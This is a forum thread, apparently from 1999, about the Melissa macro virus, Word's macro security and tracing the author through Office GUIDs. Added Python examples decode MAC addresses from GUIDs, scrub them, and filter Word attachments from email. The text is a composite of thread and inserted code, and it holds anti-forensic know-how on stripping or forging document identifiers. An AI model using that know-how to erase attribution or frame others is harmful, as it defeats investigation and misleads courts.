Microsoft Security Bulletin 99-002 points out the "vulnerability in Word 97 which could permit macros to run without warning the user when the user opens a document based on a template containing macros." Melissa modifies Word templates to do exactly this.
Microsoft's webpage continues with the warning "A malicious hacker could exploit this vulnerability to cause malicious macro code to be run without warning if a user opens a Word attachment that was sent by a malicious hacker..."
This security bulletin was posted to the Microsoft Knowledge Base on January 21, 1999.
Buried in their website, the page lamely suggests that "all affected customers" - i.e., every one of the tens of millions of Word users! - "download the patch to protect their computers." Those customers have had over two months to do exactly that, and the tiny fraction who did are presumably at least partially immune to Melissa's spread.
Posting to an obscure security webpage hints at what might make an effective virus - a virus for which the only fix is tens of millions of separate patch downloads - is asking for trouble. Microsoft created the problem by coding a laughably insecure macro language into their applications. And they may have turned the potential problem into a real one by calling attention to it.
"Security through obscurity" is never desirable, but when the system is already as broken as the Microsoft macro language and when the user community doesn't give a damn about applying patches, it might have been a better alternative.
(Credit to TBTF for the link.)
Jamie McCarthy
jamie.mccarthy.vg
So how should we feel about this? The ZDnet article only discusses the facts of the situation, which is as it should be, though there's a slight air of "this privacy-invading software feature helped catch a bad guy so it's OK" to it.
Is it good that the author's been traced? yeah, I suppose so. Doesn't matter all that much really, but I dislike viruses and their authors as much as the next person. If there's good enough proof that this is the author, and some damage can be shown, then I suppose I'm all for prosecuting.
But I care a lot less about that than about the way they caught him. It seems to me we can't just go along, and say what the ZDnet article seems, ever so slightly, to be implying: that it's all right for MS (and by extension, Intel) to build identifiers like this into their products so that anything people who use those products do is traceable, just because once it helped catch someone who was doing something illegal. That's like saying "sure, the FBI can go ahead and install a wiretap on everyone's phone--fine by me, I'm not doing anything illegal, and only people who are would have to worry about that." I don't think anyone in their right mind would agree to something like that; and it violates all the principles on which our legal system is founded: "presumed innocent until proven guilty."
It's good that they caught the author of the virus, if that were all that this meant. But it's not. I hope they don't try to prosecute unless they obtain stronger evidence, through more valid means; and if they do prosecute, I hope they don't try to use the Office-ID-number-trace in court. If they do, we're all going to have to start worrying. And looking over our shoulders.
Pancakes is the better part of valor.
There are a lot of administrators out there who just can't get enough of Micros~1. I know, I work with two of them. Micros~1 everything. Of course they are - what a coincidence - not very bright and I have no idea why they have their jobs, but that's another story.
When I pointed out that "melissa" was merely taking advantage of weaknesses built-in to Micros~1 Word, they just grinned and shrugged, as if to suggest that I'm some sort of conspiracy obsessed wacko who needs to be ignored or just laughed off. Ughh.
support gun control: take guns from cops
> That's like saying Ford should get sued when
> there's a hit-and-run
With a hit-and-run, the design of the car is not a major factor.
No, it's like saying Ford should get sued if, say, a poorly designed car door falls off of the car at 60mph and someone goes flying. Negligent design; that sort of thing.
Can you really say that Microsoft's repeated and continuous failures to implement proper security measures (i.e. levels of privilege combined with appropriate sandboxing to enforce same) for macro code are _acceptable_?
DNA just wants to be free...
Note that in Safe-Tcl it is even prohibited by default to create toplevel windows. It is very annoying to see advertisement windows pop up on your screen when you browse certain sites.
Of course, writing to arbitrary files is prohibited too, and reading user files is allowed if and only if no socket operation is allowed.
This is a bit restrictive, but a sensible security model. And Java and Javascript are plain security holes, smaller than Active-X or Word docs, but big enough for me to keep both of them disabled in my Netscape.
RTF once stood for Revisable text format
And how are you going to edit your PDFs?
You don't run Emacs as root? And what do you use to edit config files in this case? Or you have some clever script which does
chown you $1
su you -c "emacs $1"
chown root $1
One of the reasons I prefer vim to emacs is that I can edit configs in my favorite editor and don't have too much byte-compiled lisp running as root while doing so.
I would tend to believe that someone who is stupid enough to write in WordBasic for self-expression (and what other purpose do such viruses have?) probably doesn't know enough about hex editors to falsify the GUID.
And why care about some ID number while you are willingly sending out big chunks of arbitrary information from your computer with a Word file (which can contain your dialup password, private mail and even secring.pgp), waiting only for someone with LAOLA to investigate it.
I have received reports from catdoc users that they were able to read their bosses' future plans, which weren't intended to be sent just now.
Imagine the surprise of the boss when an employee begins to discuss with him plans which weren't even sent (in the boss's opinion).
> Nonsense. It's just a macro virus, not a balanced AVL tree. It doesn't take a genius to write a macro virus.
It also doesn't take a genius to replace a few bytes in one file with those from another. If every time the doc were saved it also saved a MAC (as in an encrypted hash) with the Windows global id, then we could talk about proof. As it stands, there's nothing.
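An added example, mine rather than the poster's, of the proposal just above: a keyed MAC (HMAC-SHA256 here) computed over the GUID together with the document body. A bare GUID can be copied from one file into another byte for byte, which is the framing attack this thread keeps coming back to; a tag over both parts stops verifying as soon as the body is not the one it was computed over. The key, GUID and document contents below are constructed for the illustration. One caveat: with a symmetric key, whoever can verify can also forge, so this shows only the binding; a deployed provenance scheme would sign with a private key the author holds and verify with the matching public key, and as the poster says, the documents in question carry nothing of the kind.

```python
import hashlib
import hmac


def provenance_tag(key, guid, body):
    """HMAC-SHA256 over (guid, body), hex encoded.

    A NUL separator keeps the boundary between the two inputs unambiguous, so a
    shorter GUID with a longer body cannot collide with a longer GUID and a
    shorter body.
    """
    mac = hmac.new(key, digestmod=hashlib.sha256)
    mac.update(guid.encode("ascii"))
    mac.update(b"\0")
    mac.update(body)
    return mac.hexdigest()


def save_document(key, guid, body):
    """What a 'save' would write: the GUID, the body and a tag binding them."""
    return {"guid": guid, "body": body, "tag": provenance_tag(key, guid, body)}


def check_document(key, doc):
    """Constant-time verification of the stored tag against the stored GUID and body."""
    expected = provenance_tag(key, doc["guid"], doc["body"])
    return hmac.compare_digest(expected, doc["tag"])


def forge_by_transplant(victim_doc, new_body):
    """The framing attack: lift the victim's GUID (and tag) into a new document.

    Without the key the attacker can only copy the tag that was computed over the
    victim's original body, so it will not match the new body.
    """
    return {"guid": victim_doc["guid"], "body": new_body, "tag": victim_doc["tag"]}


def bare_guid_matches(doc_a, doc_b):
    """The only check an unauthenticated GUID supports: equality of the identifier."""
    return doc_a["guid"] == doc_b["guid"]


if __name__ == "__main__":
    # Constructed sample key, GUID and bodies (hypothetical values).
    key = bytes.fromhex("000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f")
    victim = save_document(key, "6ba7b810-9dad-11d1-80b4-00c04fd430c8", b"Quarterly report, draft 3.")
    forged = forge_by_transplant(victim, b"Sub AutoOpen() ... End Sub")
    print("victim verifies:", check_document(key, victim))
    print("GUIDs match:    ", bare_guid_matches(victim, forged))
    print("forgery verifies:", check_document(key, forged))
```

The point of the demonstration is the last two lines: the identifier alone says the two files came from the same place, the tag says they did not.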
"The newsgroup alt.sex is not on this news server"
DAMN the man! And DAMN college news servers!
ZDUK says here that it's not so straightforward. Apparently the GUID is only inserted when a document is first created -- after that, copies and extreme mods leave the original GUID intact. And since most of us copy some other document and modify rather than create from scratch, the GUID is not particularly useful.
--
Infuriate left and right
Melissa and Skyroket's previous efforts were created before the whole GUID mess erupted into public.
How much you want to bet the dumb bastard DIDN'T go through the basic effort of spoofing his GUID and AOL accounts?
You cannot write a bytecode verifier, in the Java sense, for X86 assembler. This is one of those things people keep missing. Java's bytecode is typed. That means you can prevent things like casting integers into pointers, which would otherwise be possible.
Well, I guess I got lucky.... most of the users here at IPFW are in love with Word Perfect... we do have MS Word on the lab machines, but any problems with those and we just have to re-ghost the drive image back to normal.
The article says they compared the GUID to other GUIDs in documents on the suspect's web site and found that they matched. Still doesn't prove it was him and not a disgruntled script kiddie, but at least it shows how they traced the GUID.
Even if you don't use MS products at all you can still be the victim of an inbox full of email with lovely infected Word docs. Sure, you don't get harmed by the virus directly, but you still have to deal with the effects.
DFL
Never send a human to do a machine's job.
First off, well said, Mr. Madin.
This piece clearly implies that the MSID is a powerful law enforcement tool on the Digital Frontier. (BTW, I thought the out-of-nowhere references to the FBI were a nice touch.) That idea doesn't hold water, for a number of reasons. Apparently, ZD will gratuitously reinforce their message with questionable stuff like that FBI reference, but won't do the homework necessary to refute arguments that logically arise from their implied assertion.
If they can be refuted, I don't think they can.
First, there's no reason this will ever trap another hacker again, malicious or not. None. Anyone smart enough to write a Word97 macro is smart enough to obtain their own MAC address, scan the file for it, and remove it.
Is the address encrypted? The article doesn't say, which leads me to believe that it's not. Even if they do end up encrypting the thing, how hard will it be to decrypt? The only people you'll track down with this will be script kiddies killing time. Hackers knowledgeable enough to do genuine damage to a defended infrastructure are knowledgeable enough to find this ID and neutralize it.
"But that doesn't apply to the Intel ID," I can hear the ZD sycophants opine, "the Intel ID is a hardware ID, and no hacker can erase that!"
Fair enough. And the MAC address isn't?
In order for this ID to be useful in tracking down the origin of a virus, it has to be propagated in a file. Any file can be searched and have its contents modified. Period. The kind of ID you have makes no difference after it's overwritten.
So this ID will only end up in documents that are:
So the only people the ID can track are law-abiding citizens who don't care to remove the ID because their intentions are not malicious. Now why would you want to track them?
The answer is left as an exercise to the reader.
phil
What does this have to do with IPC? Macros are scripting, scripting is good. Unsandboxed bytecode not good, but all it takes is a language that can narrow its namespaces to secure it (something both Perl and Python use to sandbox their code). The CONCEPT of macros in documents is not at all bad, the implementation of the scripting interface is what sucks. I don't get it, IE will warn you about scripts and can even check script signatures. Why can't the same be done for VB and VBA?
I've finally had it: until slashdot gets article moderation, I am not coming back.
So, is there any hope of class-action against Microsoft for Negligence... if not stupidity? If they want to fine the author... the Government should also fine the inspiration. (Irony-- MS Still had to shut down their own e-mail servers...)
If you are using FAT16 (Win95), then the file itself takes maybe 16k or 32kb (minimal cluster size), depending on your partition.
While I fully agree that MSWord, MSExcel et al. write lots of crap (including chunks of your RAM with your passwords), it still makes no sense to argue about filesize.
Though I often get puzzled HOW coders at MS could program it so that a simple inserted GIF or JPG of 30k bloats the document to 400k or something. They store it as BMP and probably 3-4 times (to make it load faster????)
AtW,
http://www.investigatio.com
alexc
Join Majestic-12 Distributed Search Engine
On a tangent, I have to say that any virus that strikes only Outlook users must be seen as beneficial in the global sense.
Only Microsoft could have taken a task as simple (by design!) as reading e-mail and evolve it into a beast that takes at least 8 MB of memory when running. Strangely enough, even Microsoft's own Outlook Express tool is far lighter and friendlier, without making you feel like you're firing up Word just to read an email.
"Less is More" evidently isn't a design adage that is used much at Microsoft.
Don Box is a well-known COM expert. He wrote this script that generates GUIDs in the open, without MAC information:
GUID generator
have fun.
I was just pointing out that a GUID can be generated and used in COM programming out of the blue, without connection to specific machines, users and/or any other trackable number.
And, in case you haven't noticed, the page is a joke...
The GUIDs are generated using the machine's MAC address, the machine's clock time and two counters that serve to compensate for clock changes. In the absence of a network card, a value statistically unique for the current machine is generated.
Although a value generated on a machine without a network card is unique only for that machine, given the size of a GUID (128 bits) it is unlikely that you will find many repeated ones around.
And the dial-up does not play any role in GUID computation.
And GUID in this context is COM specific, not Microsoft specific. So, any application relying on COM is likely to use GUIDs in one form or another. But no other company has been found to insert GUIDs in the data generated by its applications.
Microsoft has been warned over and over by the Windows security community (which, believe it or not, is alive and well) about security issues surrounding "active" content. But Microsoft is not a company (but then again, is any?) to pay attention to any outside concern that does not address its own needs.
While the evolution of the Office macro language to VBA may be seen as a good thing, allowing the same code to unify all Office apps and use all features in a wholesome manner, the combined effect of VBA and the "webification" of Office brings forth security issues far beyond a Melissa.
Think about the Melissa virus as a test and about its creator as a script kid. The next virus will not be so harmless (the documented effect of Melissa is the slashdotting of some mail servers and a few hard, undeserved words being screamed in corporate corridors) nor will its author be so reckless.
Naturally I am assuming above that the GUID found points to the right machine. Wouldn't it be funny if it doesn't? Remember, the number points to a machine. And it can easily be faked (there is even a specific C++ function in the COM API to generate GUIDs. It works in the absence of network cards).
As for privacy, we should pay close attention to the development of all this. This is a media demo for IDs and also for Clipper chips (so that the "bad guys" can be traced, right?). The supporters of those features and technologies will certainly use this as a showcase.
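An added example (mine, not from any poster and not Microsoft's generator) that puts the description above of how GUIDs are built to use, and does what an earlier post suggests about scanning a file for the embedded address and removing it. It builds a version-1 GUID from a fixed clock value, clock sequence and 48-bit node, decodes the node (MAC), creation time and clock sequence back out of one, flags nodes that were generated without a network card (the multicast bit of the first octet is set, which a burned-in MAC never has), finds version-1 GUIDs in a text dump of the kind `strings` produces, and rewrites the node while keeping the rest of the value well-formed. The node 00:aa:00:b1:c2:d3, the timestamp and the sample dump are constructed for the illustration; the dashed text form matched here is what appears in text dumps and RTF, and a GUID stored as a 16-byte binary structure inside a .doc would have to be located and byte-swapped first (my assumption about the container, not something the thread establishes).

```python
import re
import secrets
import uuid
from datetime import datetime, timedelta, timezone

# 100 ns ticks between the UUID epoch (1582-10-15) and the Unix epoch (1970-01-01).
UUID_UNIX_OFFSET = 0x01B21DD213814000

# Textual GUID, with or without the braces Windows tools put around it.
GUID_RE = re.compile(
    r"\{?([0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12})\}?"
)


def make_v1(unix_seconds, clock_seq, node):
    """Assemble a version-1 GUID from explicit inputs.

    uuid.uuid1() does the same with the current clock and the host's MAC; fixed
    inputs are used here so the decoder below can be checked against known values.
    """
    ticks = unix_seconds * 10_000_000 + UUID_UNIX_OFFSET
    fields = (
        ticks & 0xFFFFFFFF,                    # time_low
        (ticks >> 32) & 0xFFFF,                # time_mid
        ((ticks >> 48) & 0x0FFF) | (1 << 12),  # time_hi with version nibble = 1
        ((clock_seq >> 8) & 0x3F) | 0x80,      # clock_seq_hi with RFC 4122 variant bits
        clock_seq & 0xFF,                      # clock_seq_low
        node & 0xFFFFFFFFFFFF,                 # 48-bit node (MAC or random)
    )
    return str(uuid.UUID(fields=fields))


def decode_v1(guid_str):
    """Recover node, creation time and clock sequence from a version-1 GUID.

    Returns None for any other version: those carry no node or timestamp.
    """
    u = uuid.UUID(guid_str)
    if u.version != 1:
        return None
    node = u.node
    unix_seconds = (u.time - UUID_UNIX_OFFSET) // 10_000_000
    when = datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=unix_seconds)
    return {
        # Octets most significant first, the way a MAC is normally written.
        "mac": ":".join(f"{(node >> (8 * i)) & 0xFF:02x}" for i in range(5, -1, -1)),
        # Bit 40 is the multicast bit of the first octet: clear on a real MAC,
        # set by generators that had to make up a node.
        "random_node": bool((node >> 40) & 1),
        "unix_time": unix_seconds,
        "timestamp": when.isoformat(),
        "clock_seq": u.clock_seq,
    }


def find_v1_guids(text):
    """(guid, decoded) for every version-1 GUID found in a text dump."""
    found = []
    for m in GUID_RE.finditer(text):
        info = decode_v1(m.group(1))
        if info is not None:
            found.append((m.group(1).lower(), info))
    return found


def scrub_node(guid_str, new_node=None):
    """Replace the node with a random, multicast-flagged one.

    Timestamp and clock sequence are kept, so the result is still a valid
    version-1 GUID that no longer points at a hardware address.
    """
    if new_node is None:
        new_node = secrets.randbits(48) | (1 << 40)
    tl, tm, thv, csh, csl, _ = uuid.UUID(guid_str).fields
    return str(uuid.UUID(fields=(tl, tm, thv, csh, csl, new_node)))


if __name__ == "__main__":
    # Constructed sample: 1999-03-26 12:00 UTC, a plausible-looking MAC, and a
    # dump containing that GUID plus a version-4 one that carries no node.
    sample = make_v1(922_449_600, 0x1234, 0x00AA00B1C2D3)
    dump = f"... {{{sample}}} ... {{123e4567-e89b-42d3-a456-426614174000}} ..."
    for guid, info in find_v1_guids(dump):
        print(guid, info)
        print("scrubbed:", scrub_node(guid))
```

Scrubbing the node does not touch the timestamp, which on its own still says when the document was created; drop the whole value, or replace it with a freshly generated one, if that matters too.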
It was soooo funny ... all of our "MIS" guys were running around saying other companies were shutting down their e-mail for a week and that MS itself had been hit hardest. If you're using MS-WORD (in Outlook) to read yer e-mail then you've got way too much memory lying around. To fix the problem, remove some of the memory, send it to me, and use a real e-mail client ... like pine :)
Maybe the next version of sendmail will have built-in filters for extracting and deleting Word documents before they reach the internet.
I can hope, anyway.
It was like that when I got here.
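As an added example (mine, not the poster's and not anything sendmail ships), the kind of filter the post above hopes for, written with Python's standard email module: it walks a message, recognises attachments by the OLE2 compound-file signature that Word 97 .doc files begin with rather than by file name, so a .doc renamed to .txt is caught as well, prunes those parts and returns the rebuilt message. The addresses, subject and attachment contents are constructed; the "document" is just the eight-byte OLE2 header padded with zeros.

```python
import email
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Signature of an OLE2 compound file, the container format of Word 97 .doc files.
OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"


def is_ole_part(part):
    """True if a leaf MIME part decodes to data starting with the OLE2 header."""
    if part.is_multipart():
        return False
    data = part.get_payload(decode=True) or b""
    return data.startswith(OLE_MAGIC)


def _prune(msg):
    """Recursively drop OLE2 leaf parts from a multipart; return removed file names."""
    removed = []
    if not msg.is_multipart():
        return removed
    kept = []
    for part in msg.get_payload():
        if is_ole_part(part):
            removed.append(part.get_filename() or "(unnamed)")
        else:
            removed.extend(_prune(part))   # nested multipart/* containers
            kept.append(part)
    msg.set_payload(kept)
    return removed


def strip_ole_attachments(raw):
    """Parse a raw message, remove OLE2 attachments, return (rebuilt bytes, names)."""
    msg = email.message_from_bytes(raw)
    removed = _prune(msg)
    return msg.as_bytes(), removed


def count_ole_parts(raw):
    """How many OLE2 parts a raw message still carries (for checking the result)."""
    msg = email.message_from_bytes(raw)
    return sum(1 for p in msg.walk() if is_ole_part(p))


def build_sample():
    """Constructed sample: a text body plus two OLE2 attachments, one misnamed .txt."""
    fake_doc = OLE_MAGIC + b"\0" * 504   # header-only stand-in for a .doc file
    msg = MIMEMultipart()
    msg["From"] = "alice@example.test"
    msg["To"] = "bob@example.test"
    msg["Subject"] = "Quarterly numbers"
    msg.attach(MIMEText("Quarterly numbers attached.\n"))
    doc = MIMEApplication(fake_doc, _subtype="msword")
    doc.add_header("Content-Disposition", "attachment", filename="report.doc")
    msg.attach(doc)
    # The same container renamed: an extension-based rule would wave it through.
    sneaky = MIMEApplication(fake_doc, _subtype="octet-stream")
    sneaky.add_header("Content-Disposition", "attachment", filename="notes.txt")
    msg.attach(sneaky)
    return msg.as_bytes()


if __name__ == "__main__":
    cleaned, removed = strip_ole_attachments(build_sample())
    print("removed:", removed)
    print("OLE parts left:", count_ole_parts(cleaned))
```

Matching on the container signature rather than on Content-Type or file name is the part that matters: the sender, or the virus, chooses both of those headers, but cannot change the first bytes of a file Word will still open.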
Um, terrorism generally means something that causes PHYSICAL harm to someone or something. Given that this virus doesn't cause physical harm, or even do any irreparable damage... I would hesitate to devalue terrorism in such a way. Blowing up a building? Bombing a plane? Now those are terrorist acts. Crashing some mail servers? It's not even remotely close. If they can figure out actual damages, that would be a much better punishment as far as fitting the crime.
-Just because we can doesn't mean we should.
Leilah
Ditto.
I figure that if I wanted to I could write this stupid virus in under 20 minutes (PLUS some other features). I've done enough stuff with VBA and MAPI to do this in my sleep. Guess I don't have the inclination to write a virii...
Virii aren't what everyone makes them out to be anymore. I remember old virii that were written in assembler (and used some pretty damn cool tricks), but now they are written using VBA (ROFL).
Justin
Mu. P.S. The address you see is real. =)
Quoting Masem:
While I am probably being paranoid and overly sceptical, it's way too convenient that the Win98 ID bug, only uncovered recently, is suddenly going to be the life saver for solving the Melissa problem.
The M$ GUID will not solve the Melissa virus from spreading. That will go on as long as one person has not taken the proper precautions.
All the GUID does is help catch the criminal who created the virus (assuming the GUID is accurate and was not forged).
Actually, the GUID creates more problems. If you want to help solve crimes in a similar manner, it would be beneficial to have wire taps and other eavesdropping devices in everyone's home. That way, if anyone in the United States mentions terrorism, they can be promptly arrested for plotting terrorist acts.
All the GUID is is Big Bro looking over your shoulder. That's not a comfortable feeling for me.
This latest development will certainly put privacy issues in regards to electronic forums to the forefront again.
~afniv
"One could be glad if the air were as pure as the beer"
Richard von Weizsäcker
My question is: Can Microsoft be held legally responsible for allowing this to happen? It is their negligence in writing programs that allows Word macro virii like Melissa in the first place. I can't think of anything better than seeing MS get into more legal trouble, but there is also the issue of what kind of precedent this would set. If MS were to get sued for writing bug/feature filled software then so could everyone else.
Anyone notice the Linux icon on the referred-to web site's front page?
I can just hear it now:
Melissa virus propagated by malicious Linux hackers.
Something I wouldn't put past those idiots over at Zdnet.
********************************************
Superstition is a word the ignorant use to describe their ignorance. -Sifu
it came from AOL.
Sure. And my three year old nephew figured out how to install Windoze without adding the bugs.
(sigh, why am I always the guy who is trying to stop the lynch mob.)
Note that Microsoft promptly released a patch for this problem, soon after it was publicly announced.
As for "buried in their website", I hardly call http://officeupdate.microsoft.com/word/ buried.
If Microsoft is going to be damned on this one, it's for unleashing a full programming environment on 90% of the word processor users out there who have absolutely no need for it. The small number of people that do use MS Office based macro applications could be bothered to run a separate installer to get the VBA environment. Of course a groupware package like Outlook needs a programming environment, so maybe Microsoft should take a look at how Lotus Notes minimizes/eliminates this problem (through a certificate infrastructure).
--
Business. Numbers. Money. People. Computer World.
It's interesting that other collaboration/e-mail packages such as Lotus Notes and Eudora are unaffected by these problems....
It would be almost trivial to recreate this kind of virus in Lotus Notes. Yet it's largely unheard of, despite Notes being the #1 commercial e-mail system. (I'm saying this not to encourage anyone, but to get Notes users to tighten their systems.)
The one protection that Notes gives you is that all code is cryptographically signed, and the user or administrator can define the rights code has depending on its signature. In a properly set up environment, Internet originated Notes macro viruses don't have a chance. However, many Notes shops have not implemented this feature.
Eudora/Outlook Express/Pine/etc. don't really have an automation interface to speak of, so they are probably relatively immune. I'm not an emacs wiz, but it may be possible there due to the lisp interpreter, although I doubt anyone would bother.
http://msdn.microsoft.com/library/specs/richtex
Can you say for sure that Groupwise/Wordperfect is immune, or just that nobody really cares about writing viruses for 3% of the market?
In the old days, there were WordPerfect and 1-2-3 macro viruses. I don't think anything's technically changed to stop them.
What kind of moron receives an attachment without warning, opens it, and then runs the macros? If you're going to do that, you deserve all that you get.
-lx
I could easily see the creator getting away with it. Depending on the manner in which the news of the GUID case was broken. If they published it before the FBI could get a search warrant, they'll have no hard evidence. Unless AOL is able to produce logs of his email, phone records confirming it, etc. All he needs to do is say that someone hex edited the files to frame him. It is entirely possible and certainly this enters within the domain of reasonable doubt.
> Why would Microsoft publicise the risks of using its over elaborate technology?
Sadly enough, exactly one of the many mainstream press stories I saw/heard on the subject even mentioned MS at all (one of two NPR bits).
If all your information came from the mainstream press, not only would you not know that it's MS's fault, but you wouldn't know what the vulnerable setup was so you could take precautions.
And face it, unless you happen to be interested in Random Topic X, all your information about Random Topic X comes from the mainstream press. Given that I cringe every time I encounter a news story about something I've got a small clue on, shouldn't I worry about believing them about things I don't know anything about? You bet!
When you say that "we have absolutely ZERO privacy online" are you referring to we as "that group of people who uses software whose source code is a secret"?
You see, I ask because those of us who use software whose source code we can (and actually do) examine, would not have any GUID or other ID sent in our emails and documents without our knowledge. Thus, this incident proves nothing about our privacy.
Oh, yes, and I also have the ability to change my MAC address. So, whoever it is you refer to as "we", you should try getting a new NIC and a new document processor (ditch Word in favor of LyX or something).
If you go to the web site:
http://www.sourceofkaos.com/homes/vic/index.htm
which has been closed down, you will see pages like o2000.html (office 2000), psd2000.zip, and a file called Xlmacr8.zip... looks like a macro to me. I dunnoooo........
linuxnewbie.com
ok so there may not be a unique identifier on the copy of office they have, but it's the MAC number on the nic which will bite them in the ass. there are some nics that can be changed, but this person's not all that bright. obviously NOT a /.'er
...was the subject of an I got yesterday morning. "How extremely convenient," I thought. "How very fortunate we are that MS is looking out for us, providing a fix almost before we even knew there was a threat."
Reminds me of a story I know where the alleged "criminal" is tricked by the "victim" into implicating himself to the authorities before the crime takes place. ("An Inspector Calls")
Of course, you're only vulnerable if you're running Windows. So, it's an HTML-borne virus that makes use of a Windows security hole. Doesn't matter if you have armor plated walls if the foundation is rotten.
The FBI is upset?
The FBI scared out of "malicious hackers"?
The FBI should be scared of itself.
What stupidity.
There are so many levels on which it is the FBI's FAULT,
1. They use MS Office (which is known to have security faults)
2. They opened up the message with the suspicious subject
3. They opened the doc attachment with word
4. They agreed to use the macro.
they had 4 mistakes, leading to the virus.
don't blame the cracker, blame yourselves,
you were idiots enough to be infected,
you are going to pay for this.
(yes bluescreens are the users fault, they DID buy windows)
---
---
I'm going to live forever, or die in the attempt.
I have an idea.
lets expose a major security hole in one of our products,
to let everyone see that GUID is a good thing.
hell, they made security holes on purpose to make GUID useful.
They planned it all along, of course,
they knew GUID would be exposed, so made it possible for them to say:
"You need GUID because our products are bad and have many exploits for crackers to play with"
it reminds me when Microsoft bragged that NT servers had failsafe modes,
and when a server crashes,
another server can replace it.
If NT servers didn't crash so often nobody would care.
Tomorrow they'll use it to hunt down a "criminal" who disagrees with the Chinese government.
> All software is broken.
at least now we really know for sure that we have absolutely ZERO privacy online. have fun people!! long live e-commerce and credit card numbers flying all 'round!! viva big brother!!
have i mentioned lately that our prying gov't is lame?
"All that glitters is not gold"
because of the publicity regarding the UID's, anyone smart enough to engineer this type of thing would be smart enough to be able to cover their tracks.
That's true, assuming that the writer a) knew about the GUID's and b) was actually competent enough to spoof it. Since Melissa was created before the GUID's became common knowledge, he probably didn't know about the ID. As far as competence is concerned, you don't need to know anything about MAC addresses to write virii, especially in VBA.
But, you're right. Whether the guy wrote it or not is irrelevant. A MAC-based ID is not a unique identifier, and to treat it as such is more irresponsible than authoring the virus in the first place.
-tak
How much you wanna bet that the ethernet card that created the file in which the virus was embedded is presently either a) ash or b) under several feet of water.
I had the same thought last night especially when the news came out about the 'tracking'. I mean, how hard is it to forge the GUID, right?
Of course not only can you get creamed for programming, you also can get it for downloading, even connecting...
I would think that there are some first-amendment type issues when we're talking about programming though, right? I mean, it's one thing to write it, another to deploy it.
Funny, one of the things that Microsoft's GUID is built from is, in fact, the ethernet ID.
If you've ever run any of the multi-media SW that I helped write back in the early 90's (not likely, but still) you've had non-network software look at your ethernet ID. Run Mathematica? it looks at your ethernet ID to build its $MachineID. Countless other programs do. Read the article again.
Whew- taking this a little personally aren't we? Keep telling yourself "It's only a multi-billion dollar company, it's only a multi-billion dollar company..." over and over again until you are "clear" (scientology speak)
You would think that Exchange server administrators would be smart enough to at least start filtering attachments or running a virus scan on incoming traffic. I guess not, since M$ themselves were offline yesterday...
It's interesting that other collaboration/e-mail packages such as Lotus Notes and Eudora are unaffected by these problems....
Why are M$ products *designed* to be so blatantly insecure? I'm sure the basic principles of program security have been around for ages... what motivates M$ to deliberately ignore them?
It's not coincidence that issues like the GUID are troubling us now... these technologies were created for specific purposes... and look how easy it was for two non-M$ people to track down the creator of the Melissa docs.
Conspiracy theories, my ass. More than enough evidence to go on here.
"Kinky sex involves the use of duck feathers. Perverted sex involves the whole duck." - Lewis Grizzard
I'm not sure if use of such GUID's would hold up in court since it is private information gathered by an illegal search. The user did not give permission for his unique ID to be attached to his .doc file. The app (Word) had no just cause to attach this ID either so it's similar to having the feds tap your phone without a warrant.
That's not a good analogy. It's not an illegal search if someone looks in a document that you created and distributed for a GUID. Just as it's not a problem for the Gov't to take fingerprints off a letter that you sent or DNA samples from the saliva you used to lick a stamp or an envelope shut. Once you voluntarily give something up, it's fair game for the man.
Perhaps a real issue in a court would be how easy is it to forge a GUID so that it looks like the document came from someone else.
I have discovered a truly marvelous sig, unfortunately the sig limit is too small to contain i
You can only voluntarily give up something you KNOW you have ... the unknown data attached to it without your consent by a 3rd party should not fall under these same rules.
I'd like to say that you are correct, but (for ill or good) legal rulings hold otherwise. The FBI has taken saliva samples from a coffee cup that they gave to someone who was being interrogated and had those samples admitted as evidence. Surely the perp didn't know that they could do that. It follows the same legal theory that having voluntarily given up something places it out of the realm of illegal search and seizure. Unfortunate but true.
ABC news reported this morning on their radio coverage (as lately as 10pm EST) that the FBI had traced the emergence of the virus to somewhere in Europe, with no mention of AOL, unique IDs, etc.
;)
I would say that ZD and ABC are reporting different information. Is the FBI throwing nonsense to ABC? Does the FBI know about the AOL trace (one would think so)?
Well, whatever. My linux boxen somehow don't appear in the "Address Books" of MS-only users, so I guess that's a blessing. I'd hate to have to read the virus document safely and just delete it
roundeye
"Cause there's 40 different shades of black, so many fortresses and ways to attack, so why you complainin'?"
Fact of the matter is that back when all the big fuss about all this came out I wrote a program to remove them and/or replace them. Whoever wrote Melissa could have easily used my program, Guideon, to replace the IDs.
For that matter they could have done it by hand with a simple hex editor. It would be all too ironic for one hacker to frame another, but it's hard to believe that he/she would not be following this GUID issue.
So in order for it to stand up in court there's going to need to be some other evidence to prove that this individual really did it.
While I, like the rest of them, would like to see virus writers brought to justice, we *CANNOT* convict people on easily falsified evidence alone.
Your own post even shows how clueless you are: RTF files created in Word 6.0 (and later) for the Macintosh and Power Macintosh have a file type of "RTF."
Versus what we're talking of as a .doc.
What if MS created the worm/virus in order to justify the GUID that is drawing heat from many people. How convenient is this timing of events? I find most coincidences aren't.
I'm not saying this is the case, but you sometimes have to wonder...
BUT, with the FBI (and possibly several other departments of the govt), major partners of Microsoft (Intel, Compaq), major customers etc involved. I would doubt MS would be that moronic. Not that they have a good track record, considering their trial performance, but I doubt it.
This is the worst kind of bloat I can imagine - a fancy text editor mated to a BASIC interpreter. Granted the usefulness of an integrated development environment in your word processor, it is doubly insane to permit programs to run automatically when the document is opened. While it is possible to disable macros in Word, this is not the default. 90% of users don't use macros (unless they are infected), so why couldn't MS change just one bit in its distribution from ON to OFF and do some serious good toward slowing the spread of macro viruses?
The really sad thing is you can't sue them. They create an obviously deficient product, one which they could easily have changed to prevent material harm to their customers, yet they are not liable. But let somebody pour coffee all over their genitals, and Ronald McDonald is paying to the tune of $n*1E6.
It's not hard at all. The GUID is stored as cleartext (!) in the Office documents. Open one of yours (if you don't have one, you can download a template from Office Update). For instance, the person who put together the PowerPoint "Project Overview" template has this GUID: {DB2F2831-22EE-11D0-BC57-00805F883DE4}. For those who are interested in conspiracies, you should rewrite the last part as 00:80:5F:88:3D:E4. That's right: The GUID contains the MAC.
Websites access this by an ActiveX control in your %WINDIR%. Microsoft accesses it so that they can put it in your microsoft.com cookie. You can read about this, and how to disable the control, at Winmag.
Mike
--
"Wi nøt trei a høliday in Sweden this yër?"
